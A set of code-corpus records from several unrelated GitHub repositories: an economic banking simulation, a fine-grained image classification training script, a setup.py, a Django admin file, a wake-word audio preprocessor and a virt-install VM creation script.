total_stock_supply:\n        p_market = (p_market + p_market_min) / 2\n    else:\n        p_market = p_market\n\n    ret_on_sec = p_market / p_market_old - 1\n    ret_sec_shbank = ret_on_sec\n    p_market_vector.append(p_market)\n    ret_sec_bank_vector.append(ret_on_sec)\n\n    every = total_stock_demand\n    every_thing_vector.append(every)\n\n    every1 = total_stock_supply\n    every1_thing_vector.append(every1)\n\n    every2 = p_market\n    every2_thing_vector.append(every2)\n\n# rfree_plot = []\n# for i in range(0, len(rfree_vector)):\n#     rfree_plot.append([float(rfree_vector[i])])\n#\n# p_market_plot = []\n# for i in range(0, len(p_market_vector)):\n#     p_market_plot.append([float(p_market_vector[i])])\n#\n# ret_on_sec_plot = []\n# for i in range(0, len(ret_sec_bank_vector)):\n#     ret_on_sec_plot.append([float(ret_sec_bank_vector[i])])\n\nevery_thing_plot = []\nfor i in range(0, len(every_thing_vector)):\n    every_thing_plot.append([float(every_thing_vector[i])])\n\nevery1_thing_plot = []\nfor i in range(0, len(every1_thing_vector)):\n    every1_thing_plot.append([float(every1_thing_vector[i])])\n\nevery2_thing_plot = 
[]\nfor i in range(0, len(every2_thing_vector)):\n every2_thing_plot.append([float(every2_thing_vector[i])])\n\n# print(ret_on_sec_plot)\n# print(p_market_plot)\n# print(rfree_plot)\n# print(every_thing_vector)\n\n\n# plt.plot(rfree_plot)\n# plt.show()\n# plt.plot(p_market_plot)\n# plt.show()\n# plt.plot(ret_on_sec_plot)\n# plt.show()\n\nplt.plot(every_thing_plot)\nplt.plot(every1_thing_plot)\nplt.plot(every2_thing_plot)\n\nplt.show()\n#\n# plt.plot(every2_thing_plot)\n# plt.show()\n\n\n# print(every_thing_plot)\n# print(every1_thing_plot)\n# print(every2_thing_plot)", "repo_name": "vahidito/banking-system-model", "sub_path": "banking system model.py", "file_name": "banking system model.py", "file_ext": "py", "file_size_in_byte": 22345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.random.normal", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.beta", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 134, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 135, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", 
"line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "scipy.optimize.linprog", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 174, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 200, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "scipy.optimize.linprog", "line_number": 209, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 442, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 442, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 443, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 443, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 444, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 444, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 446, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 446, "usage_type": "name"}]} +{"seq_id": "21900582791", "text": "from dv.DFL import DFL_VGG16, DFL_ResNet50, Energy_ResNet50\nfrom dv.init import *\nfrom dv.MyImageFolderWithPaths import CarsDataset, CUB_2011\nfrom dv.transform import *\nfrom dv.util import *\nfrom train import *\nfrom validate import *\nfrom visualize import *\nimport sys\nimport argparse\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\n\nparser = argparse.ArgumentParser(description='Discriminative Filter Learning within a CNN')\nparser.add_argument('--dataroot', metavar='DIR',\n help='path to dataset')\nparser.add_argument('--result', metavar='DIR',\n help='path to store visualization outputs')\nparser.add_argument('--vis_img', metavar='DIR',\n help='path to get images to visualize')\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--num_filters', default=4, type=int,\n help='Number of filters per class.')\nparser.add_argument('--gpu', default=4, type=int,\n help='GPU nums to use.')\nparser.add_argument('--epochs', default=100000, type=int, 
metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('--train_batchsize_per_gpu', default=4, type=int,\n metavar='N', help='mini-batch size (default: 4)')\nparser.add_argument('-testbatch', '--test_batch_size', default=1, type=int,\n metavar='N', help='mini-batch size (default: 1)')\nparser.add_argument('--init_type', default='xavier', type=str,\n metavar='INIT',help='init net')\nparser.add_argument('--lr', '--learning-rate', default=0.001, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float,\n metavar='momentum', help='momentum')\nparser.add_argument('--weight_decay', '--wd', default=0.0001, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--print-freq', '-p', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--resume', default='', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',\n help='evaluate model on validation set')\nparser.add_argument('--class_idx', default = 27, type = int, metavar='N',\n help='class number of the images to be visualized')\nparser.add_argument('--log_train_dir', default='log_train', type=str,\n help='log for train')\nparser.add_argument('--log_test_dir', default='log_test', type=str,\n help='log for test')\nparser.add_argument('--nclass', default=196, type=int,\n help='num of classes -- stanford cars has 196 classes (default: 196)')\nparser.add_argument('--eval_epoch', default=2, type=int,\n help='every eval_epoch we will evaluate')\nparser.add_argument('--vis_epoch', default=2, type=int,\n help='every vis_epoch we will evaluate')\nparser.add_argument('--w', default=448, type=int,\n help='desired image width to crop, seen as align')\nparser.add_argument('--h', default=448, type=int,\n help='desired image height to crop, seen as align')\nparser.add_argument('--dataset', default='cars', type=str,\n metavar='dataset',help='Data to use (cars, birds)')\n\nbest_prec1 = 0\n\ndef main():\n print('Deep Vision <==> Part1 : setting up parameters <==> Begin')\n global args, best_prec1\n args = parser.parse_args()\n print(sys.argv[1:])\n img_dir = os.path.abspath(args.dataroot)\n print('Deep Vision <==> Part1 : setting up parameters <==> Done')\n\n print('Deep Vision <==> Part2 : loading network <==> Begin')\n\n if args.vis_img is not None:\n print('Using VGG Backend...')\n model = DFL_VGG16(k = args.num_filters, nclass = args.nclass) # stanford cars has 196 classes\n else:\n print('Using ResNet Backend...')\n model = DFL_ResNet50(k = args.num_filters, nclass = args.nclass)\n energyNet = Energy_ResNet50(k = args.num_filters, nclass = args.nclass) # for non-random initialization\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n if args.gpu is not None:\n model = nn.DataParallel(model, device_ids=range(args.gpu))\n model.to(device)\n if args.vis_img is None:\n energyNet.to(device)\n cudnn.benchmark = True\n\n if args.init_type is not None:\n transform_sample = get_transform_for_test_simple()\n\n if args.dataset == 'cars':\n sample_dataset = CarsDataset(os.path.join(img_dir,'devkit/cars_train_annos.mat'),\n os.path.join(img_dir,'cars_train'),\n os.path.join(img_dir,'devkit/cars_meta.mat'),\n transform=transform_sample\n )\n elif args.dataset == 
\"birds\":\n sample_dataset = CUB_2011(img_dir, train=True, transform=transform_sample, download=True)\n\n sample_loader = torch.utils.data.DataLoader(sample_dataset, batch_size=1, shuffle=True, num_workers=args.workers, pin_memory=True, drop_last = False)\n\n init_weights(model, init_type=args.init_type) # initialize all layers\n print('Network is initialized with: %s!' % args.init_type)\n if args.vis_img is None:\n center = init_patch(args, sample_loader, energyNet, 1024) #1024 channels in the feature map\n model.state_dict()['conv6.weight'] = center #the 1x1 filters are initialized with patch representations\n print('Patch detectors are initialized with non-random init!')\n model.to(device)\n\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay = args.weight_decay)\n\n # Optionally resume from a checkpoint\n if args.resume:\n if os.path.isfile(args.resume):\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n best_prec1 = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n print('Deep Vision <==> Part2 : loading network <==> Continue from {} epoch {}'.format(args.resume, checkpoint['epoch']))\n else:\n print('Deep Vision <==> Part2 : loading network <==> Failed')\n print('Deep Vision <==> Part2 : loading network <==> Done')\n\n\n\n print('Deep Vision <==> Part3 : loading dataset <==> Begin')\n\n # transformations are defined in \"dv\" module\n transform_train = get_transform_for_train()\n transform_test = get_transform_for_test()\n transform_test_simple = get_transform_for_test_simple()\n\n if args.dataset == \"birds\":\n train_dataset = CUB_2011(img_dir, train=True, transform=transform_train)\n test_dataset = CUB_2011(img_dir, train=False, transform=transform_test)\n test_dataset_simple = CUB_2011(img_dir, train=False, transform=transform_test_simple)\n elif args.dataset == \"cars\":\n train_dataset = CarsDataset(os.path.join(img_dir,'devkit/cars_train_annos.mat'),\n os.path.join(img_dir,'cars_train'),\n os.path.join(img_dir,'devkit/cars_meta.mat'),\n transform=transform_train\n )\n test_dataset = CarsDataset(os.path.join(img_dir,'devkit/cars_test_annos_withlabels.mat'),\n os.path.join(img_dir,'cars_test'),\n os.path.join(img_dir,'devkit/cars_meta.mat'),\n transform=transform_test\n )\n test_dataset_simple = CarsDataset(os.path.join(img_dir,'devkit/cars_test_annos_withlabels.mat'),\n os.path.join(img_dir,'cars_test'),\n os.path.join(img_dir,'devkit/cars_meta.mat'),\n transform=transform_test_simple\n )\n\n # data loader\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.gpu * args.train_batchsize_per_gpu, shuffle=True,\n num_workers=args.workers, pin_memory=True, drop_last = False)\n test_loader = torch.utils.data.DataLoader(\n test_dataset, batch_size=args.test_batch_size, shuffle=True,\n num_workers=args.workers, pin_memory=True, drop_last = False)\n test_loader_simple = torch.utils.data.DataLoader(\n test_dataset_simple, batch_size=args.test_batch_size, shuffle=True,\n num_workers=args.workers, pin_memory=True, drop_last = False)\n print('Deep Vision <==> Part3 : loading dataset <==> Done')\n\n\n print('Deep Vision <==> Part4 : model training <==> Begin')\n\n if args.gpu is not None:\n torch.cuda.empty_cache()\n\n for epoch in range(args.start_epoch, args.epochs):\n adjust_learning_rate(args, optimizer, epoch, gamma = 0.1)\n\n # train for one epoch\n train(args, 
train_loader, model, criterion, optimizer, epoch)\n\n # check if model is still on GPU\n print('Model on GPU?: ', next(model.parameters()).is_cuda)\n\n # evaluate on validation set\n if args.evaluate and epoch % args.eval_epoch == 0:\n prec1 = validate_dv(args, test_loader, model, criterion, epoch)\n\n # remember best prec@1 and save checkpoint\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'best_prec1': best_prec1,\n 'optimizer' : optimizer.state_dict(),\n 'prec1' : prec1,\n }, is_best)\n\n # do a test for visualization\n if args.vis_img is not None and epoch % args.vis_epoch == 0 and epoch != 0:\n draw_patch_v2(epoch, model, args, args.class_idx)\n\n\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Physicist91/dvfp", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 10306, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "dv.DFL.DFL_VGG16", "line_number": 86, "usage_type": "call"}, {"api_name": "dv.DFL.DFL_ResNet50", "line_number": 89, "usage_type": "call"}, {"api_name": "dv.DFL.Energy_ResNet50", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.nn.DataParallel", "line_number": 94, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 94, "usage_type": "name"}, {"api_name": "torch.backends.cudnn.benchmark", "line_number": 98, "usage_type": "attribute"}, {"api_name": "torch.backends.cudnn", "line_number": 98, "usage_type": "name"}, {"api_name": "dv.MyImageFolderWithPaths.CarsDataset", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "dv.MyImageFolderWithPaths.CUB_2011", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 112, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 112, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 123, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 128, "usage_type": "call"}, {"api_name": "dv.MyImageFolderWithPaths.CUB_2011", "line_number": 148, "usage_type": "call"}, {"api_name": 
"dv.MyImageFolderWithPaths.CUB_2011", "line_number": 149, "usage_type": "call"}, {"api_name": "dv.MyImageFolderWithPaths.CUB_2011", "line_number": 150, "usage_type": "call"}, {"api_name": "dv.MyImageFolderWithPaths.CarsDataset", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path", "line_number": 153, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "dv.MyImageFolderWithPaths.CarsDataset", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "dv.MyImageFolderWithPaths.CarsDataset", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path", "line_number": 163, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 164, "usage_type": "call"}, {"api_name": "os.path", "line_number": 164, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 169, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 172, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 175, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 175, "usage_type": "attribute"}, {"api_name": "torch.cuda.empty_cache", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 184, "usage_type": "attribute"}]} +{"seq_id": "72659473793", "text": "from setuptools import setup, find_packages\nfrom typing import List\n\ndef get_requirements(file_path: str='requirements.txt') -> List[str]:\n with open(file_path) as f:\n requirements = f.read().splitlines()\n if '-e .' 
in requirements:\n requirements.remove('-e .')\n return requirements\n\nsetup(\n name='KoroKoro',\n version='1.0.0',\n description='See your e-commerce products in 3D',\n author='Dahiru Ibrahim',\n author_email='suhayrid6@gmail.com',\n packages=find_packages(),\n install_requires=get_requirements(),\n)", "repo_name": "Daheer/KoroKoro", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 11, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "20020810790", "text": "from django.contrib import admin\n\nfrom .models import Setting, ContactMessage, Events\n\n\nclass SettingAdmin(admin.ModelAdmin):\n list_display = ['title', 'update_at', 'status']\n list_filter = ['title']\n\nclass ContactMessageAdmin(admin.ModelAdmin):\n list_display = ['name', 'update_at', 'status']\n list_filter = ['status']\n readonly_fields = ('name', 'update_at', 'subject', 'your_email', 'your_message', 'ip')\n\nclass EventsAdmin(admin.ModelAdmin):\n list_display = ['title', 'update_at', 'status']\n list_filter = ['status']\n prepopulated_fields = {\"slug\": (\"title\",)}\n\n\nadmin.site.register(Setting, SettingAdmin)\nadmin.site.register(ContactMessage, ContactMessageAdmin)\nadmin.site.register(Events, EventsAdmin)\n\n# Register your models here.\n", "repo_name": "Killman03/mylibsite", "sub_path": "home/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 762, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 10, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 15, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Setting", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 22, "usage_type": "call"}, {"api_name": "models.ContactMessage", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 23, "usage_type": "call"}, {"api_name": "models.Events", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "6382664117", "text": "\nimport tensorflow as tf\nimport tensorflow_io as tfio\nimport keras\nfrom keras import layers\nfrom keras.layers import Dense, Flatten, 
Conv2D\nfrom keras.models import Sequential, load_model\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pathlib\nimport os\nfrom IPython import display\nimport matplotlib.pyplot as plt\nfrom glob import glob\nimport IPython.display as ipd\nimport pandas as pd\nfrom datetime import date\nfrom datetime import datetime\nimport wave\nimport AudioStream\n\n\ndef log(preds):\n now = datetime.now().strftime(\"%d-%m-%Y\")\n \n log = pd.DataFrame(preds)\n log.to_csv('Logs' + '/' + 'log ' + now + '.csv', index=False)\n\ndef initialize():\n model = keras.models.load_model(\"./Training/processor.h5\")\n return model\n\ndef merge_wav():\n infiles = os.listdir(\"./Process-Segments\")\n print(infiles)\n outfile = \"./Process/process.wav\"\n\n data= []\n for infile in infiles:\n w = wave.open(\"./Process-Segments/\" + infile, 'rb')\n data.append( [w.getparams(), w.readframes(w.getnframes())] )\n w.close()\n \n output = wave.open(outfile, 'wb')\n output.setparams(data[0][0])\n for i in range(len(data)):\n output.writeframes(data[i][1])\n output.close()\n\ndef load_wav(filename):\n file_contents = tf.io.read_file(filename)\n wav, sample_rate = tf.audio.decode_wav(file_contents, desired_channels=1)\n \n wav = tf.squeeze(wav, axis=-1)\n sample_rate = tf.cast(sample_rate, dtype=tf.int64)\n \n wav = tfio.audio.resample(wav, rate_in=sample_rate, rate_out=16000)\n return wav\n\ndef preprocess(file_path, label):\n wav = load_wav(file_path)\n wav = wav[:48000]\n zero_padding = tf.zeros([48000] - tf.shape(wav), dtype=tf.float32)\n wav = tf.concat([zero_padding, wav],0)\n spectrogram = tf.signal.stft(wav, frame_length=320, frame_step=32)\n spectrogram = tf.abs(spectrogram)\n spectrogram = tf.expand_dims(spectrogram, axis=2)\n return spectrogram, label\n\ndef process():\n \n merge_wav()\n \n EVAL = os.path.join('Process')\n eval = tf.data.Dataset.list_files(EVAL +'/*.wav')\n\n data = tf.data.Dataset.zip((eval, tf.data.Dataset.from_tensor_slices(tf.ones(len(eval)))))\n\n data = data.map(preprocess)\n data = data.cache()\n data = data.shuffle(buffer_size=1000)\n data = data.batch(8)\n data = data.prefetch(8)\n\n #preds = model.predict(data)\n\n '''results = ['1' if x > 0.5 else 0 for x in preds]\n \n os.remove(\"./Process/process.wav\")\n log(preds)\n \n for i in range(len(results)):\n results[i] = bool(results[i])\n if(bool(results[i])):\n return True\n return False'''\n return False\n\n\n", "repo_name": "ogsean51/HomeBot", "sub_path": "WakeProcessor.py", "file_name": "WakeProcessor.py", "file_ext": "py", "file_size_in_byte": 2676, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 26, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 30, "usage_type": "call"}, {"api_name": "keras.models", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 40, "usage_type": "call"}, {"api_name": "wave.open", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.io.read_file", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.audio.decode_wav", "line_number": 52, "usage_type": "call"}, {"api_name": 
"tensorflow.audio", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.squeeze", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow_io.audio.resample", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow_io.audio", "line_number": 57, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.concat", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.signal.stft", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.signal", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tensorflow.abs", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.list_files", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.zip", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.ones", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "32869393975", "text": "#!/usr/bin/env python\n\nimport sh\nimport sys\n\ndef install_base_vm(base_domain=\"\", install_media_path=\"\", base_img_path=\"\", base_RAM=512):\n \"\"\"\n Use virt-install to create a base vm to make clones\n\n base_domain == domain name according to virsh\n\n install_media_path == path to .iso, pool, etc\n\n base_img_path == path to .img file to be created\n \"\"\"\n\n if base_domain and install_media_path and base_img_path:\n sh.virt_install('--connect=qemu:///system',\n '-n %s' % (base_domain),\n '-r %s' % (base_RAM),\n '--disk', 'path=%s,size=5,sparse=false' % (base_img_path),\n '-l %s' % (install_media_path),\n '--os-type', 'linux',\n '--hvm',\n '--vnc')\n\n else:\n sys.exit(\"Invalid parameters to install_base_vm()\")\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 4:\n base_domain = sys.argv[1]\n install_media_path = sys.argv[2]\n base_img_path = sys.argv[3]\n\n install_base_vm(base_domain, install_media_path, base_img_path)\n\n else:\n sys.exit(\"Usage: %s base_domain install_media_path base_img_path\" % (sys.argv[0]))\n", "repo_name": "bmoar/vm", "sub_path": "bin/install_base.py", "file_name": "install_base.py", "file_ext": "py", "file_size_in_byte": 1197, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sh.virt_install", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 28, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 31, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 32, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}, {"api_name": "sys.exit", 
